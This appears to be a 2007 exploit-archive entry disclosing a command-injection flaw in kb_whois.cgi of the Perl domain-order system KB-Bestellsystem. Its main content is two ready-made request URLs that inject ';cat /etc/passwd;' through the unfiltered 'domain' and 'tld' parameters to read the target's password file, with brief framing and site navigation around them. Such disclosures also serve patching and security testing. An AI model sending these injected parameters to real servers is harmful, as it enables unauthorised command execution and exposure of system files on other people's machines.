KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability
# Published : 2007-11-22
# Author : Zero X
# Previous Title : PHPKIT 1.6.4pl1 article.php Remote SQL Injection Exploit
# Next Title : Ucms <= 1.8 Backdoor Remote Command Execution Exploit

"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>

# www.Syue.com [2007-11-22]